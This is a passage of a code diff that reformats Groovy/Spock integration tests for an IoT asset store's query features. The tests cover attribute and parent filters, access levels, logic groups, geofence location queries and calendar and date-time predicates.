-                    .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
-                    .parents(new ParentPredicate(managerTestSetup.agentId))
-        )
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
+            .names(new StringPredicate(Match.CONTAINS, true, "thing"))
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "result should match"
+    assets.size() == 0
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
-                    .parents(new ParentPredicate(managerTestSetup.apartment1LivingroomId))
-        )
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
+            .parents(new ParentPredicate(managerTestSetup.agentId))
+            )
 
-        then: "result should match"
-        assets.size() == 0
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-        )
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
+            .parents(new ParentPredicate(managerTestSetup.apartment1LivingroomId))
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "result should match"
+    assets.size() == 0
 
-        when: "a query is executed to select a subset of attributes"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                    .ids(managerTestSetup.apartment1LivingroomId)
-                    .select(new Select().attributes("co2Level", "lastPresenceDetected", "motionSensor"))
-                    .access(PRIVATE)
-        )
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            )
 
-        then: "result should match"
-        asset.id == managerTestSetup.apartment1LivingroomId
-        asset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        asset.name == "Living Room 1"
-        asset.type == RoomAsset.DESCRIPTOR.getName()
-        asset.parentId != null
-        asset.realm == keycloakTestSetup.realmBuilding.name
-        asset.path != null
-        asset.getAttributes().size() == 3
-        asset.getAttribute("co2Level").isPresent()
-        !asset.getAttribute("co2Level").get().meta.isEmpty()
-        asset.getAttribute("lastPresenceDetected").isPresent()
-        !asset.getAttribute("lastPresenceDetected").get().meta.isEmpty()
-        asset.getAttribute("motionSensor").isPresent()
-        !asset.getAttribute("motionSensor").get().meta.isEmpty()
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
 
-        when: "a query is executed to select a subset of protected attributes"
-        asset = assetStorageService.find(
-                new AssetQuery()
-                        .ids(managerTestSetup.apartment1LivingroomId)
-                        .select(new Select().attributes("co2Level", "lastPresenceDetected", "motionSensor"))
-                        .access(PROTECTED)
-        )
+    when: "a query is executed to select a subset of attributes"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .ids(managerTestSetup.apartment1LivingroomId)
+            .select(new Select().attributes("co2Level", "lastPresenceDetected", "motionSensor"))
+            .access(PRIVATE)
+            )
 
-        then: "result should contain only matches that are protected"
-        asset.id == managerTestSetup.apartment1LivingroomId
-        asset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        asset.name == "Living Room 1"
-        asset.type == RoomAsset.DESCRIPTOR.getName()
-        asset.parentId == managerTestSetup.apartment1Id
-        asset.realm == keycloakTestSetup.realmBuilding.name
-        asset.path != null
-        asset.getAttributes().size() == 1
-        asset.getAttribute("co2Level").isPresent()
-        !asset.getAttribute("co2Level").get().meta.isEmpty()
-        !asset.getAttribute("lastPresenceDetected").isPresent()
-        !asset.getAttribute("motionSensor").isPresent()
+    then: "result should match"
+    asset.id == managerTestSetup.apartment1LivingroomId
+    asset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    asset.name == "Living Room 1"
+    asset.type == RoomAsset.DESCRIPTOR.getName()
+    asset.parentId != null
+    asset.realm == keycloakTestSetup.realmBuilding.name
+    asset.path != null
+    asset.getAttributes().size() == 3
+    asset.getAttribute("co2Level").isPresent()
+    !asset.getAttribute("co2Level").get().meta.isEmpty()
+    asset.getAttribute("lastPresenceDetected").isPresent()
+    !asset.getAttribute("lastPresenceDetected").get().meta.isEmpty()
+    asset.getAttribute("motionSensor").isPresent()
+    !asset.getAttribute("motionSensor").get().meta.isEmpty()
 
-        when: "a query is executed to select an asset with multiple attribute predicates 'ANDED'"
-        asset = assetStorageService.find(
-                new AssetQuery().attributes(
-                        new AttributePredicate(
-                                new StringPredicate("windowOpen"), new BooleanPredicate(false)
-                        ),
+    when: "a query is executed to select a subset of protected attributes"
+    asset = assetStorageService.find(
+            new AssetQuery()
+            .ids(managerTestSetup.apartment1LivingroomId)
+            .select(new Select().attributes("co2Level", "lastPresenceDetected", "motionSensor"))
+            .access(PROTECTED)
+            )
+
+    then: "result should contain only matches that are protected"
+    asset.id == managerTestSetup.apartment1LivingroomId
+    asset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    asset.name == "Living Room 1"
+    asset.type == RoomAsset.DESCRIPTOR.getName()
+    asset.parentId == managerTestSetup.apartment1Id
+    asset.realm == keycloakTestSetup.realmBuilding.name
+    asset.path != null
+    asset.getAttributes().size() == 1
+    asset.getAttribute("co2Level").isPresent()
+    !asset.getAttribute("co2Level").get().meta.isEmpty()
+    !asset.getAttribute("lastPresenceDetected").isPresent()
+    !asset.getAttribute("motionSensor").isPresent()
+
+    when: "a query is executed to select an asset with multiple attribute predicates 'ANDED'"
+    asset = assetStorageService.find(
+            new AssetQuery().attributes(
+                    new AttributePredicate(
+                            new StringPredicate("windowOpen"), new BooleanPredicate(false)
+                            ),
+                    new AttributePredicate(
+                            new StringPredicate("co2Level"), new NumberPredicate(340, Operator.GREATER_THAN)
+                            )
+                    )
+            )
+
+    then: "result should contain an Asset with the expected values"
+    assert asset != null
+    assert asset.getAttribute("windowOpen").isPresent()
+    assert !asset.getAttribute("windowOpen").get().value.get()
+    assert asset.getAttribute("co2Level").isPresent()
+    assert asset.getAttribute("co2Level").get().value.get() == 350
+
+    when: "a query is executed to select an asset with multiple attribute predicates 'ANDED' where one predicate is false"
+    asset = assetStorageService.find(
+            new AssetQuery().attributes(
+                    new AttributePredicate(
+                            new StringPredicate("windowOpen"), new BooleanPredicate(false)
+                            ),
+                    new AttributePredicate(
+                            new StringPredicate("co2Level"), new NumberPredicate(360, Operator.GREATER_THAN)
+                            )
+                    )
+            )
+
+    then: "no assets should match"
+    assert asset == null
+  }
+
+  def "Query logic groups"() {
+
+    when: "a query is executed to select an asset with and conditions on the same attribute"
+    def asset = assetStorageService.find(
+            new AssetQuery().attributes(
+                    new AttributePredicate(
+                            new StringPredicate("co2Level"), new NumberPredicate(360, Operator.LESS_EQUALS)
+                            ),
+                    new AttributePredicate(
+                            new StringPredicate("co2Level"), new NumberPredicate(50, Operator.GREATER_THAN)
+                            )
+                    )
+            )
+
+    then: "result should contain an Asset with the expected values"
+    assert asset != null
+    assert asset.getAttribute("windowOpen").isPresent()
+    assert !asset.getAttribute("windowOpen").get().value.get()
+    assert asset.getAttribute("co2Level").isPresent()
+    assert asset.getAttribute("co2Level").get().value.get() == 350
+
+    when: "a query is executed to select an asset with multiple logic groups"
+    asset = assetStorageService.find(
+            new AssetQuery().attributes(
+                    new LogicGroup<AttributePredicate>(LogicGroup.Operator.AND, [
+                      new LogicGroup<AttributePredicate>(LogicGroup.Operator.OR, [
                         new AttributePredicate(
                                 new StringPredicate("co2Level"), new NumberPredicate(340, Operator.GREATER_THAN)
-                        )
-                )
-        )
-
-        then: "result should contain an Asset with the expected values"
-        assert asset != null
-        assert asset.getAttribute("windowOpen").isPresent()
-        assert !asset.getAttribute("windowOpen").get().value.get()
-        assert asset.getAttribute("co2Level").isPresent()
-        assert asset.getAttribute("co2Level").get().value.get() == 350
-
-        when: "a query is executed to select an asset with multiple attribute predicates 'ANDED' where one predicate is false"
-        asset = assetStorageService.find(
-            new AssetQuery().attributes(
-                new AttributePredicate(
-                    new StringPredicate("windowOpen"), new BooleanPredicate(false)
-                ),
-                new AttributePredicate(
-                    new StringPredicate("co2Level"), new NumberPredicate(360, Operator.GREATER_THAN)
-                )
+                                ),
+                        new AttributePredicate(
+                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.LESS_THAN)
+                                )
+                      ])
+                    ], [
+                      new AttributePredicate(
+                              new StringPredicate("windowOpen"), new BooleanPredicate(false)
+                              )
+                    ])
+                    )
             )
-        )
 
-        then: "no assets should match"
-        assert asset == null
-    }
+    then: "result should contain an Asset with the expected values"
+    assert asset != null
+    assert asset.getAttribute("windowOpen").isPresent()
+    assert !asset.getAttribute("windowOpen").get().value.get()
+    assert asset.getAttribute("co2Level").isPresent()
+    assert asset.getAttribute("co2Level").get().value.get() == 350
 
-    def "Query logic groups"() {
-
-        when: "a query is executed to select an asset with and conditions on the same attribute"
-        def asset = assetStorageService.find(
-                new AssetQuery().attributes(
+    when: "a query is executed to select an asset with multiple logic groups and one of the groups is false"
+    asset = assetStorageService.find(
+            new AssetQuery().attributes(
+                    new LogicGroup<AttributePredicate>(LogicGroup.Operator.AND, [
+                      new LogicGroup<AttributePredicate>(LogicGroup.Operator.OR, [
                         new AttributePredicate(
-                                new StringPredicate("co2Level"), new NumberPredicate(360, Operator.LESS_EQUALS)
-                        ),
+                                new StringPredicate("co2Level"), new NumberPredicate(340, Operator.GREATER_THAN)
+                                ),
                         new AttributePredicate(
-                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.GREATER_THAN)
-                        )
-                )
-        )
-
-        then: "result should contain an Asset with the expected values"
-        assert asset != null
-        assert asset.getAttribute("windowOpen").isPresent()
-        assert !asset.getAttribute("windowOpen").get().value.get()
-        assert asset.getAttribute("co2Level").isPresent()
-        assert asset.getAttribute("co2Level").get().value.get() == 350
-
-        when: "a query is executed to select an asset with multiple logic groups"
-        asset = assetStorageService.find(
-                new AssetQuery().attributes(
-                        new LogicGroup<AttributePredicate>(LogicGroup.Operator.AND, [
-                                new LogicGroup<AttributePredicate>(LogicGroup.Operator.OR, [
-                                        new AttributePredicate(
-                                                new StringPredicate("co2Level"), new NumberPredicate(340, Operator.GREATER_THAN)
-                                        ),
-                                        new AttributePredicate(
-                                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.LESS_THAN)
-                                        )
-                                ])
-                        ], [
-                                new AttributePredicate(
-                                        new StringPredicate("windowOpen"), new BooleanPredicate(false)
+                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.LESS_THAN)
                                 )
-                        ])
-                )
-        )
+                      ])
+                    ], [
+                      new AttributePredicate(
+                              new StringPredicate("windowOpen"), new BooleanPredicate(true)
+                              )
+                    ])
+                    )
+            )
 
-        then: "result should contain an Asset with the expected values"
-        assert asset != null
-        assert asset.getAttribute("windowOpen").isPresent()
-        assert !asset.getAttribute("windowOpen").get().value.get()
-        assert asset.getAttribute("co2Level").isPresent()
-        assert asset.getAttribute("co2Level").get().value.get() == 350
+    then: "no assets should match"
+    assert asset == null
 
-        when: "a query is executed to select an asset with multiple logic groups and one of the groups is false"
-        asset = assetStorageService.find(
-                new AssetQuery().attributes(
-                        new LogicGroup<AttributePredicate>(LogicGroup.Operator.AND, [
-                                new LogicGroup<AttributePredicate>(LogicGroup.Operator.OR, [
-                                        new AttributePredicate(
-                                                new StringPredicate("co2Level"), new NumberPredicate(340, Operator.GREATER_THAN)
-                                        ),
-                                        new AttributePredicate(
-                                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.LESS_THAN)
-                                        )
-                                ])
-                        ], [
-                                new AttributePredicate(
-                                        new StringPredicate("windowOpen"), new BooleanPredicate(true)
+    when: "a query is executed to select an asset with multiple logic groups where the other logic group is false"
+    asset = assetStorageService.find(
+            new AssetQuery().attributes(
+                    new LogicGroup<AttributePredicate>(LogicGroup.Operator.AND, [
+                      new LogicGroup(LogicGroup.Operator.OR, [
+                        new AttributePredicate(
+                                new StringPredicate("co2Level"), new NumberPredicate(360, Operator.GREATER_THAN)
+                                ),
+                        new AttributePredicate(
+                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.LESS_THAN)
                                 )
-                        ])
-                )
-        )
+                      ])
+                    ], [
+                      new AttributePredicate(
+                              new StringPredicate("windowOpen"), new BooleanPredicate(false)
+                              )
+                    ])
+                    )
+            )
 
-        then: "no assets should match"
-        assert asset == null
+    then: "no assets should match"
+    assert asset == null
+  }
 
-        when: "a query is executed to select an asset with multiple logic groups where the other logic group is false"
-        asset = assetStorageService.find(
-                new AssetQuery().attributes(
-                        new LogicGroup<AttributePredicate>(LogicGroup.Operator.AND, [
-                                new LogicGroup(LogicGroup.Operator.OR, [
-                                        new AttributePredicate(
-                                                new StringPredicate("co2Level"), new NumberPredicate(360, Operator.GREATER_THAN)
-                                        ),
-                                        new AttributePredicate(
-                                                new StringPredicate("co2Level"), new NumberPredicate(50, Operator.LESS_THAN)
-                                        )
-                                ])
-                        ], [
-                                new AttributePredicate(
-                                        new StringPredicate("windowOpen"), new BooleanPredicate(false)
-                                )
-                        ])
-                )
-        )
+  def "Location queries"() {
 
-        then: "no assets should match"
-        assert asset == null
+    given: "polling conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "a location filtering query is executed"
+    def assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new LocationAttributePredicate(new RadialGeofencePredicate(10, 51.44541688237109d, 5.460315214821094d)))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .orderBy(new OrderBy(NAME))
+            )
+
+    then: "assets in the queried region should be retrieved"
+    assets.size() == 5
+    assets.find {it.id == managerTestSetup.agentId}.name == "Demo Agent"
+    assets.find {it.id == managerTestSetup.thingId}.name == "Demo Thing"
+    assets.find {it.id == managerTestSetup.groundFloorId}.name == "Ground floor"
+    assets.find {it.id == managerTestSetup.lobbyId}.name == "Lobby"
+    assets.find {it.id == managerTestSetup.smartOfficeId}.name == "Smart office"
+
+    when: "one of the assets in the region is moved"
+    def lobby = assetStorageService.find(managerTestSetup.lobbyId, true) as RoomAsset
+    lobby.setLocation(new GeoJSONPoint(5.46108d, 51.44593d))
+    lobby = assetStorageService.merge(lobby)
+
+    then: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 100)
     }
 
-    def "Location queries"() {
-
-        given: "polling conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        when: "a location filtering query is executed"
-        def assets = assetStorageService.findAll(
+    when: "the same query is run again"
+    assets = assetStorageService.findAll(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(new LocationAttributePredicate(new RadialGeofencePredicate(10, 51.44541688237109d, 5.460315214821094d)))
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .orderBy(new OrderBy(NAME))
-        )
+            .select(new Select().excludeAttributes())
+            .attributes(new LocationAttributePredicate(new RadialGeofencePredicate(10, 51.44541688237109d, 5.460315214821094d)))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .orderBy(new OrderBy(NAME))
+            )
 
-        then: "assets in the queried region should be retrieved"
-        assets.size() == 5
-        assets.find {it.id == managerTestSetup.agentId}.name == "Demo Agent"
-        assets.find {it.id == managerTestSetup.thingId}.name == "Demo Thing"
-        assets.find {it.id == managerTestSetup.groundFloorId}.name == "Ground floor"
-        assets.find {it.id == managerTestSetup.lobbyId}.name == "Lobby"
-        assets.find {it.id == managerTestSetup.smartOfficeId}.name == "Smart office"
+    then: "the moved asset should not be included"
+    assets.size() == 4
+    !assets.any {it.name == "Lobby"}
 
-        when: "one of the assets in the region is moved"
-        def lobby = assetStorageService.find(managerTestSetup.lobbyId, true) as RoomAsset
-        lobby.setLocation(new GeoJSONPoint(5.46108d, 51.44593d))
-        lobby = assetStorageService.merge(lobby)
-
-        then: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 100)
-        }
-
-        when: "the same query is run again"
-        assets = assetStorageService.findAll(
+    when: "a rectangular region is used that includes previous assets and moved asset"
+    assets = assetStorageService.findAll(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(new LocationAttributePredicate(new RadialGeofencePredicate(10, 51.44541688237109d, 5.460315214821094d)))
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .orderBy(new OrderBy(NAME))
-        )
+            .select(new Select().excludeAttributes())
+            .attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(51.44540d, 5.46031d, 51.44594d, 5.46110d)))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .orderBy(new OrderBy(NAME))
+            )
 
-        then: "the moved asset should not be included"
-        assets.size() == 4
-        !assets.any {it.name == "Lobby"}
+    then: "all 5 assets should be returned"
+    assets.size() == 5
+    assets.find {it.id == managerTestSetup.agentId}.name == "Demo Agent"
+    assets.find {it.id == managerTestSetup.thingId}.name == "Demo Thing"
+    assets.find {it.id == managerTestSetup.groundFloorId}.name == "Ground floor"
+    assets.find {it.id == managerTestSetup.lobbyId}.name == "Lobby"
+    assets.find {it.id == managerTestSetup.smartOfficeId}.name == "Smart office"
 
-        when: "a rectangular region is used that includes previous assets and moved asset"
-        assets = assetStorageService.findAll(
+    when: "a rectangular region is used that doesn't cover any assets"
+    assets = assetStorageService.findAll(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(51.44540d, 5.46031d, 51.44594d, 5.46110d)))
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .orderBy(new OrderBy(NAME))
-        )
+            .select(new Select().excludeAttributes())
+            .attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(51.44542d, 5.46032d, 51.44590d, 5.46100d)))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .orderBy(new OrderBy(NAME))
+            )
 
-        then: "all 5 assets should be returned"
-        assets.size() == 5
-        assets.find {it.id == managerTestSetup.agentId}.name == "Demo Agent"
-        assets.find {it.id == managerTestSetup.thingId}.name == "Demo Thing"
-        assets.find {it.id == managerTestSetup.groundFloorId}.name == "Ground floor"
-        assets.find {it.id == managerTestSetup.lobbyId}.name == "Lobby"
-        assets.find {it.id == managerTestSetup.smartOfficeId}.name == "Smart office"
+    then: "no assets should be returned"
+    assets.size() == 0
 
-        when: "a rectangular region is used that doesn't cover any assets"
-        assets = assetStorageService.findAll(
+    when: "the same region is used but negated"
+    assets = assetStorageService.findAll(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(51.44542d,  5.46032d, 51.44590d, 5.46100d)))
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .orderBy(new OrderBy(NAME))
-        )
+            .select(new Select().excludeAttributes())
+            .attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(51.44542d, 5.46032d, 51.44590d, 5.46100d).negate()))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .orderBy(new OrderBy(NAME))
+            )
 
-        then: "no assets should be returned"
-        assets.size() == 0
+    then: "all 5 realm assets should be returned"
+    assets.size() == 5
+    assets.find {it.id == managerTestSetup.agentId}.name == "Demo Agent"
+    assets.find {it.id == managerTestSetup.thingId}.name == "Demo Thing"
+    assets.find {it.id == managerTestSetup.groundFloorId}.name == "Ground floor"
+    assets.find {it.id == managerTestSetup.lobbyId}.name == "Lobby"
+    assets.find {it.id == managerTestSetup.smartOfficeId}.name == "Smart office"
+  }
 
-        when: "the same region is used but negated"
-        assets = assetStorageService.findAll(
-            new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(new LocationAttributePredicate(new RectangularGeofencePredicate(51.44542d,  5.46032d, 51.44590d, 5.46100d).negate()))
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .orderBy(new OrderBy(NAME))
-        )
+  def "Calendar queries"() {
+    given: "polling conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        then: "all 5 realm assets should be returned"
-        assets.size() == 5
-        assets.find {it.id == managerTestSetup.agentId}.name == "Demo Agent"
-        assets.find {it.id == managerTestSetup.thingId}.name == "Demo Thing"
-        assets.find {it.id == managerTestSetup.groundFloorId}.name == "Ground floor"
-        assets.find {it.id == managerTestSetup.lobbyId}.name == "Lobby"
-        assets.find {it.id == managerTestSetup.smartOfficeId}.name == "Smart office"
-    }
+    when: "several assets are given a calendar event configuration attribute"
+    def lobby = assetStorageService.find(managerTestSetup.lobbyId, true)
+    def floor = assetStorageService.find(managerTestSetup.groundFloorId, true)
+    def office = assetStorageService.find(managerTestSetup.smartOfficeId, true)
+    def calendar = Calendar.getInstance(Locale.ROOT)
+    calendar.setTimeInMillis(1517151600000) // 28/01/2018 @ 3:00pm (UTC)
+    def start = calendar.getTime()
+    calendar.add(Calendar.HOUR, 2)
+    def end = calendar.getTime()
+    def recur = new Recur(Frequency.DAILY, 5)
+    recur.setInterval(2)
 
-    def "Calendar queries"() {
-        given: "polling conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        when: "several assets are given a calendar event configuration attribute"
-        def lobby = assetStorageService.find(managerTestSetup.lobbyId, true)
-        def floor = assetStorageService.find(managerTestSetup.groundFloorId, true)
-        def office = assetStorageService.find(managerTestSetup.smartOfficeId, true)
-        def calendar = Calendar.getInstance(Locale.ROOT)
-        calendar.setTimeInMillis(1517151600000) // 28/01/2018 @ 3:00pm (UTC)
-        def start = calendar.getTime()
-        calendar.add(Calendar.HOUR, 2)
-        def end = calendar.getTime()
-        def recur = new Recur(Frequency.DAILY, 5)
-        recur.setInterval(2)
-
-        lobby.addAttributes(
+    lobby.addAttributes(
             new Attribute<>("test", CALENDAR_EVENT, new CalendarEvent(start, end, recur))
-        )
-        lobby = assetStorageService.merge(lobby)
+            )
+    lobby = assetStorageService.merge(lobby)
 
-        recur = new Recur(Frequency.DAILY, 3)
-        recur.setInterval(2)
+    recur = new Recur(Frequency.DAILY, 3)
+    recur.setInterval(2)
 
-        floor.addAttributes(
+    floor.addAttributes(
             new Attribute<>("test", CALENDAR_EVENT, new CalendarEvent(start, end, recur))
-        )
-        floor = assetStorageService.merge(floor)
-        office.addAttributes(
+            )
+    floor = assetStorageService.merge(floor)
+    office.addAttributes(
             new Attribute<>("test", CALENDAR_EVENT, new CalendarEvent(start, end))
-        )
-        office = assetStorageService.merge(office)
+            )
+    office = assetStorageService.merge(office)
 
-        then: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 100)
-        }
-
-        when: "a calendar event filtering query is executed for the correct date and time of the event"
-        def assets = assetStorageService.findAll(
-            new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517155200000)))) // 28/01/2018 @ 4:00pm (UTC)
-                .orderBy(new OrderBy(NAME))
-        )
-
-        then: "all 3 assets should be returned"
-        assets.size() == 3
-        assets.any {it.id == managerTestSetup.lobbyId}
-        assets.any {it.name == "Lobby"}
-        assets.any {it.id == managerTestSetup.groundFloorId}
-        assets.any {it.name == "Ground floor"}
-        assets.any {it.id == managerTestSetup.smartOfficeId}
-        assets.any {it.name == "Smart office"}
-
-        when: "a calendar event filtering query is executed for future event on a correct day but wrong time"
-        assets = assetStorageService.findAll(
-            new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517335200000)))) // 30/01/2018 @ 6:00pm (UTC)
-                .orderBy(new OrderBy(NAME))
-        )
-
-        then: "no assets should be returned"
-        assets.size() == 0
-
-        when: "a calendar event filtering query is executed for a future event on a wrong day but correct time"
-        assets = assetStorageService.findAll(
-            new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517238600000)))) // 29/01/2018 @ 3:10pm (UTC)
-                .orderBy(new OrderBy(NAME))
-        )
-
-        then: "no assets should be returned"
-        assets.size() == 0
-
-        when: "a calendar event filtering query is executed inside a valid future event date and time"
-        assets = assetStorageService.findAll(
-            new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517503800000)))) // 01/02/2018 @ 4:50pm (UTC))
-                .orderBy(new OrderBy(NAME))
-        )
-
-        then: "the lobby and ground floor assets should be returned"
-        assets.size() == 2
-        assets.any {it.id == managerTestSetup.lobbyId}
-        assets.any {it.name == "Lobby"}
-        assets.any {it.id == managerTestSetup.groundFloorId}
-        assets.any {it.name == "Ground floor"}
-
-        when: "a calendar event filtering query is executed inside a valid future event date and time of the lobby asset"
-        assets = assetStorageService.findAll(
-            new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517849400000)))) // 05/02/2018 @ 4:50pm (UTC))
-                .orderBy(new OrderBy(NAME))
-        )
-
-        then: "the lobby and ground floor assets should be returned"
-        assets.size() == 1
-        assets.any {it.id == managerTestSetup.lobbyId}
-        assets.any {it.name == "Lobby"}
-
-        when: "a calendar event filtering query is executed for some time after the last occurrence"
-        assets = assetStorageService.findAll(
-            new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1518017520000)))) // 02/07/2018 @ 3:32pm (UTC)
-                .orderBy(new OrderBy(NAME))
-        )
-
-        then: "no assets should be returned"
-        assets.size() == 0
+    then: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 100)
     }
 
-    def "DateTime queries"() {
-        when: "the lobby has an opening date and the date falls is between the filtering date"
-        def lobby = assetStorageService.find(managerTestSetup.lobbyId, true)
-        lobby.addAttributes(
-                new Attribute<>("openingDate", TIMESTAMP_ISO8601, Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()).format(ISO_OFFSET_DATE_TIME)) // 28/01/2018 @ 2:00pm (UTC)
-        )
-        lobby = assetStorageService.merge(lobby)
+    when: "a calendar event filtering query is executed for the correct date and time of the event"
+    def assets = assetStorageService.findAll(
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517155200000)))) // 28/01/2018 @ 4:00pm (UTC)
+            .orderBy(new OrderBy(NAME))
+            )
 
-        def rangeStart = Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()).minusHours(2) // 28/01/2018 @ 1:00pm (UTC)
-        def rangeEnd = Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()).plusHours(3) // 28/01/2018 @ 6:00pm (UTC)
+    then: "all 3 assets should be returned"
+    assets.size() == 3
+    assets.any {it.id == managerTestSetup.lobbyId}
+    assets.any {it.name == "Lobby"}
+    assets.any {it.id == managerTestSetup.groundFloorId}
+    assets.any {it.name == "Ground floor"}
+    assets.any {it.id == managerTestSetup.smartOfficeId}
+    assets.any {it.name == "Smart office"}
 
-        def assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                    .attributeValue(
-                        "openingDate",
-                        new DateTimePredicate(rangeStart.format(ISO_OFFSET_DATE_TIME), rangeEnd.format(ISO_OFFSET_DATE_TIME))
-                            .operator(Operator.BETWEEN))
-        )
+    when: "a calendar event filtering query is executed for future event on a correct day but wrong time"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517335200000)))) // 30/01/2018 @ 6:00pm (UTC)
+            .orderBy(new OrderBy(NAME))
+            )
+
+    then: "no assets should be returned"
+    assets.size() == 0
+
+    when: "a calendar event filtering query is executed for a future event on a wrong day but correct time"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
